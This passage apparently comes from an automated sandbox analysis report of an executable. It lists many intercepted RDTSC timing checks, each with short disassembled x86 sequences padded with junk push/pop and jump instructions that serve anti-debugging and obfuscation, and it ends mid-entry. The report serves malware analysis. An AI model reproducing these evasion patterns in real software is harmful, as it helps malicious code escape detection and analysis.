Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1241CCE second address: 1241CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F49E47F2153h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F49E47F214Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1241CF7 second address: 1241D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C445h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F49E4E2C43Ah 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1245D1D second address: 1245D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1245D25 second address: 1245D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F49E4E2C436h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1245D34 second address: 1245D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F49E47F2158h 0x00000011 js 00007F49E47F2146h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124662E second address: 124663B instructions: 0x00000000 rdtsc 0x00000002 js 00007F49E4E2C438h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124663B second address: 124666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F49E47F2151h 0x00000014 jmp 00007F49E47F2152h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124666F second address: 1246677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1246E73 second address: 1246E7F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49E47F2146h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A70E second address: 124A714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A714 second address: 124A725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F214Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A725 second address: 124A750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F49E4E2C436h 0x0000000e popad 0x0000000f popad 0x00000010 jng 00007F49E4E2C469h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F49E4E2C441h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A750 second address: 124A764 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F49E47F2146h 0x00000008 jng 00007F49E47F2146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124A764 second address: 124A768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125057E second address: 1250588 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49E47F2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124EF94 second address: 124EF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 124EF9A second address: 124EF9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF16B second address: 11CF171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF171 second address: 11CF175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF175 second address: 11CF17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CF17B second address: 11CF1BB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F49E47F214Ch 0x00000008 jbe 00007F49E47F214Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 js 00007F49E47F216Ah 0x00000016 jmp 00007F49E47F2154h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f js 00007F49E47F2146h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125041E second address: 1250432 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49E4E2C43Ch 0x00000008 js 00007F49E4E2C436h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125389B second address: 12538C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 jmp 00007F49E47F2153h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f je 00007F49E47F2146h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12538C6 second address: 12538CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12538CB second address: 12538E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F49E47F2146h 0x00000009 jne 00007F49E47F2146h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jl 00007F49E47F2154h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12538E7 second address: 12538EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258E52 second address: 1258E5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258E5A second address: 1258E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258FC6 second address: 1258FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593AA second address: 12593AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593AE second address: 12593B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593B6 second address: 12593D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E4E2C444h 0x00000008 jmp 00007F49E4E2C43Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12593D9 second address: 1259405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F49E47F214Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F49E47F214Dh 0x00000014 jno 00007F49E47F2148h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259537 second address: 1259549 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49E4E2C436h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258AAF second address: 1258AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258AB3 second address: 1258AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1258AD0 second address: 1258B13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F49E47F2152h 0x00000008 jmp 00007F49E47F214Ah 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F49E47F2159h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007F49E47F2152h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259952 second address: 1259958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259958 second address: 125995C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125995C second address: 1259975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F49E4E2C441h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259975 second address: 1259979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1259B05 second address: 1259B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F49E4E2C436h 0x0000000a ja 00007F49E4E2C436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125E621 second address: 125E625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121BDC3 second address: 121BDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F49E4E2C447h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C19B second address: 121C19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C19F second address: 121C1A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C27B second address: 121C27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C27F second address: 121C290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F49E4E2C436h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C290 second address: 121C2A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C33B second address: 121C341 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C341 second address: 121C36D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F49E47F2158h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C36D second address: 121C372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C372 second address: 121C3F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F49E47F2150h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F49E47F2154h 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F49E47F2148h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1D22h], edi 0x0000003a push A6050D00h 0x0000003f pushad 0x00000040 jmp 00007F49E47F2150h 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C4AD second address: 121C4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C7AB second address: 121C7B5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F49E47F214Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121CB01 second address: 121CB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F49E4E2C440h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121CF73 second address: 121CF78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121CF78 second address: 121CFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+12466283h], ecx 0x0000000e lea eax, dword ptr [ebp+1248D9CCh] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F49E4E2C438h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D30A8h], edi 0x00000034 nop 0x00000035 jo 00007F49E4E2C444h 0x0000003b pushad 0x0000003c jc 00007F49E4E2C436h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125E90F second address: 125E91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F49E47F2146h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125EFBB second address: 125EFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125F111 second address: 125F115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125F115 second address: 125F119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125F119 second address: 125F137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F49E47F2153h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 125F2C7 second address: 125F305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F49E4E2C440h 0x0000000b popad 0x0000000c jng 00007F49E4E2C43Ch 0x00000012 jmp 00007F49E4E2C443h 0x00000017 jg 00007F49E4E2C455h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12622FE second address: 1262304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1262304 second address: 1262323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F49E4E2C446h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12625C8 second address: 12625CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1267E18 second address: 1267E33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C447h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D0B2B second address: 11D0B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F2156h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D0B45 second address: 11D0B62 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49E4E2C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F49E4E2C43Bh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126D570 second address: 126D574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126D574 second address: 126D57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126D9A0 second address: 126D9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F49E47F2151h 0x00000010 jmp 00007F49E47F214Bh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126D9CF second address: 126D9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C447h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F49E4E2C436h 0x00000011 jl 00007F49E4E2C436h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126D9FA second address: 126D9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126D9FF second address: 126DA11 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49E4E2C43Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DA11 second address: 126DA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DA17 second address: 126DA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DB80 second address: 126DB95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F49E47F2146h 0x0000000b popad 0x0000000c pushad 0x0000000d jg 00007F49E47F2146h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DD43 second address: 126DD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C444h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DD5B second address: 126DD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DD5F second address: 126DD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F49E4E2C436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007F49E4E2C449h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 126DD8B second address: 126DD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C95E second address: 121C978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C978 second address: 121C99A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F49E47F2151h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 121C99A second address: 121CA44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D31B1h], edx 0x0000000e mov ebx, dword ptr [ebp+1248DA0Bh] 0x00000014 call 00007F49E4E2C447h 0x00000019 mov edx, dword ptr [ebp+122D3487h] 0x0000001f pop edx 0x00000020 add eax, ebx 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F49E4E2C438h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c push eax 0x0000003d jnp 00007F49E4E2C43Eh 0x00000043 jl 00007F49E4E2C438h 0x00000049 push eax 0x0000004a pop eax 0x0000004b mov dword ptr [esp], eax 0x0000004e push 00000000h 0x00000050 push esi 0x00000051 call 00007F49E4E2C438h 0x00000056 pop esi 0x00000057 mov dword ptr [esp+04h], esi 0x0000005b add dword ptr [esp+04h], 